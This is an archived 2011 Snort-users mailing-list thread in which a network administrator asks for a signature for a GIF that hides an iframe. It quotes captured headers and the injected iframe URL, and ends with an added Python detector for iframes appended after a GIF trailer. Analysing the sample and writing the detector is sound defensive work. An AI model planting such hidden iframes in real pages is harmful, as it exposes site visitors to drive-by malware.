[Snort-users] iFrame's in gifs

James Lay jlay at ...13475...
Fri Jun 24 21:15:01 EDT 2011


Thanks RM...this certainly looks kinda like it.  One thing I noticed is
that within the wearing-jewelry.html there's a specific portion in the
code that calls /img/, but with no actual image called for....looks
like a naughty person got in, modified the html code, then uploaded the
malicious gif...crazy!

On 6/24/11 4:24 PM, "rmkml" <rmkml at ...1855...> wrote:

>Hi James,
>Maybe:
>http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan:Win32/Jpgiframe.A
>Regards
>Rmkml
>
>
>On Fri, 24 Jun 2011, Lay, James wrote:
>
>> Hey all!
>>
>> Anyone got any leads on this or a sig for this?  Excitement below..I
>> have full pcap as well as the original image if anyone wants um.
>>
>> James
>>
>> Sanitized headers
>>
>> GET /img/ HTTP/1.1
>> Cookie: <snip>
>> Host: magazine.gem-fashion.com
>> Accept: */*
>> Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
>> Accept-Language: en-us
>> UA-CPU: x86
>> Connection: Keep-Alive
>>
>> HTTP/1.1 404 Object Not Found
>> Date: Fri, 24 Jun 2011 21:15:39 GMT
>> Server: Apache
>> X-Powered-By: PHP/5.2.11
>> Expires: Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
>> Pragma: no-cache
>> Set-Cookie: <snip>; path=/
>> Content-Length: 1221
>> Keep-Alive: timeout=5, max=99
>> Connection: Keep-Alive
>> Content-Type: image/gif
>>
>>
>>
>> GIF87a <snip>;<iframe
>> src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
>> style='visibility: hidden;'></iframe>
>>
>> 
>>------------------------------------------------------------------------------
>> All the data continuously generated in your IT infrastructure contains a
>> definitive record of customers, application performance, security
>> threats, fraudulent activity and more. Splunk takes this data and makes
>> sense of it. Business sense. IT sense. Common sense..
>> http://p.sf.net/sfu/splunk-d2d-c1
>> _______________________________________________
>> Snort-users mailing list
>> Snort-users at lists.sourceforge.net
>> Go to this URL to change user options or unsubscribe:
>> https://lists.sourceforge.net/lists/listinfo/snort-users
>> Snort-users list archive:
>> http://www.geocrawler.com/redir-sf.php3?list=snort-users
>>
>> Please see http://www.snort.org/docs for documentation
>>
>
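One way to turn the capture quoted above into a check (an added example written for this archive page, not code from the thread or a Snort rule): it mirrors what a signature would key on, a response claiming Content-Type image/gif whose body starts with the GIF magic and then carries an `<iframe` tag right after the GIF trailer byte. The response, the 1x1 GIF and the iframe URL are constructed placeholders, not the bytes from the thread.

```python
import re

# Constructed 1x1 GIF87a (header, 2-entry colour table, one image block, ';' trailer).
TINY_GIF = (
    b"GIF87a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)

# Constructed response modelled on the headers in the thread: a 404 that still declares
# image/gif and hides an iframe straight after the GIF trailer. URL is a placeholder.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 404 Object Not Found\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: image/gif\r\n"
    b"\r\n" + TINY_GIF +
    b"<iframe src='http://example.invalid/index.php' width='1' height='1' "
    b"style='visibility: hidden;'></iframe>"
)

IFRAME_RE = re.compile(rb"<\s*iframe\b", re.IGNORECASE)


def split_response(raw):
    """Split a raw HTTP response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, body


def inspect_gif_response(raw):
    """Return {'status', 'findings'} for a GIF-typed response that looks tampered, else None."""
    status, headers, body = split_response(raw)
    if not headers.get("content-type", "").lower().startswith("image/gif"):
        return None  # only responses claiming to be a GIF are of interest here
    findings = []
    if not body.startswith((b"GIF87a", b"GIF89a")):
        findings.append("content-type image/gif but body lacks GIF magic")
    match = IFRAME_RE.search(body)
    if match:
        # The capture shows ';<iframe': the HTML sits right after the 0x3B GIF trailer.
        after_trailer = match.start() > 0 and body[match.start() - 1] == 0x3B
        where = "immediately after GIF trailer" if after_trailer else "inside image data"
        findings.append(f"<iframe> at offset {match.start()} ({where})")
    if status.split(" ")[1:2] == ["404"]:
        findings.append("404 status served with an image/gif body")
    return {"status": status, "findings": findings} if findings else None
```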